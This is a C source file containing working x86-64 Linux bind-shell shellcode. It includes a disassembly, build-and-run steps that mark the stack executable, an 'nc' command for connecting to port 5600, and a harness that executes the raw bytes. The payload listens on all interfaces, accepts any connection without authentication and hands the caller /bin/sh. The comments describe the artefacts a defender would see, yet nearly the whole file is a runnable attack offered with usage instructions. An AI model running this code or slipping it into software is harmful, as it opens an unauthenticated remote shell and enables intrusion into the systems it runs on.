  1.  
  2.  
  3. /*
  4.  
  5. Disassembly of section .text:
  6.  
  7. 0000000000400080 <.text>:
  8. 400080: 48 31 c0 xor %rax,%rax
  9. 400083: 48 31 d2 xor %rdx,%rdx
  10. 400086: 48 31 f6 xor %rsi,%rsi
  11. 400089: ff c6 inc %esi
  12. 40008b: 6a 29 pushq $0x29
  13. 40008d: 58 pop %rax
  14. 40008e: 6a 02 pushq $0x2
  15. 400090: 5f pop %rdi
  16. 400091: 0f 05 syscall
  17. 400093: 48 97 xchg %rax,%rdi
  18. 400095: 6a 02 pushq $0x2
  19. 400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
  20. 40009e: 54 push %rsp
  21. 40009f: 5e pop %rsi
  22. 4000a0: 52 push %rdx
  23. 4000a1: 6a 31 pushq $0x31
  24. 4000a3: 58 pop %rax
  25. 4000a4: 6a 10 pushq $0x10
  26. 4000a6: 5a pop %rdx
  27. 4000a7: 0f 05 syscall
  28. 4000a9: 5e pop %rsi
  29. 4000aa: 6a 32 pushq $0x32
  30. 4000ac: 58 pop %rax
  31. 4000ad: 0f 05 syscall
  32. 4000af: 6a 2b pushq $0x2b
  33. 4000b1: 58 pop %rax
  34. 4000b2: 0f 05 syscall
  35. 4000b4: 48 97 xchg %rax,%rdi
  36. 4000b6: 6a 03 pushq $0x3
  37. 4000b8: 5e pop %rsi
  38. 4000b9: ff ce dec %esi
  39. 4000bb: b0 21 mov $0x21,%al
  40. 4000bd: 0f 05 syscall
  41. 4000bf: 75 f8 jne 0x4000b9
  42. 4000c1: f7 e6 mul %esi
  43. 4000c3: 52 push %rdx
  44. 4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
  45. 4000cb: 2f 73 68
  46. 4000ce: 53 push %rbx
  47. 4000cf: 48 8d 3c 24 lea (%rsp),%rdi
  48. 4000d3: b0 3b mov $0x3b,%al
  49. 4000d5: 0f 05 syscall
  50.  
  51. ---------------------------------------------------------------------------------------------------
  52.  
  53. How To Run
  54.  
  55. $ gcc -o bind_shell bind_shell.c
  56. $ execstack -s bind_shell
  57. $ ./bind_shell
  58.  
  59. How to Connect
  60.  
  61. $ nc <HOST IP ADDRESS> 5600
  62.  
  63. Eg:
  64.  
  65. $ nc 127.0.0.1 5600
  66.  
  67. ---------------------------------------------------------------------------------------------------
  68. */
  69. #include <stdio.h>
  /*
   * Raw x86-64 Linux machine code, byte-for-byte the listing disassembled in
   * the header comment, grouped here by the system call each run of bytes
   * ends in.
   *
   * Behaviour visible to a defender, as read from that disassembly:
   *   - a TCP socket is bound to port 5600 with a zero address field
   *     (all interfaces) and put into the listening state;
   *   - one connection is accepted, with no check on the peer;
   *   - the accepted descriptor is duplicated onto fds 2, 1 and 0;
   *   - the process image is replaced by /bin//sh with NULL argv and envp.
   * The resulting artefacts are an unexpected listener on 5600/tcp and a
   * shell process whose stdin, stdout and stderr are the same socket.
   */
  char sh[] =
      /* rax=41: socket(AF_INET=2, SOCK_STREAM=1, 0) */
      "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05"
      /* rax=49: bind(fd, {family 2, port bytes 15 e0 = 5600, addr 0}, 16) */
      "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05"
      /* rax=50: listen(fd, 0) */
      "\x5e\x6a\x32\x58\x0f\x05"
      /* rax=43: accept(fd, NULL, ...) */
      "\x6a\x2b\x58\x0f\x05"
      /* rax=33: dup2(client, n) for n = 2, 1, 0 (loop ends when n hits 0) */
      "\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8"
      /* rax=59: execve("/bin//sh", NULL, NULL) */
      "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
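  /*
   * Test harness: calls the bytes held in sh[] as a function taking no
   * arguments.
   *
   * sh[] is an initialised, writable global, so the call only works if that
   * data is mapped executable; the `execstack -s` step in the header comment
   * exists for that reason.  Where the kernel keeps data pages
   * non-executable regardless of the stack marking, the call faults instead
   * (NOTE(review): depends on kernel and personality flags; confirm on the
   * target system).
   *
   * argc and argv are accepted for signature compatibility and not used.
   * Returns 0 if control ever comes back from the called bytes.
   */
  int main(int argc, char **argv)
  {
      /* Declared with an empty parameter list, as in the original cast. */
      int (*func)();

      (void)argc;
      (void)argv;

      /* Object-to-function pointer conversion: not defined by ISO C,
       * accepted by the compilers this harness is built with. */
      func = (int (*)())sh;

      /* The result is deliberately ignored, as before. */
      (void)func();

      /* main is declared int (void main is non-conforming), so give the
       * caller a defined exit status. */
      return 0;
  }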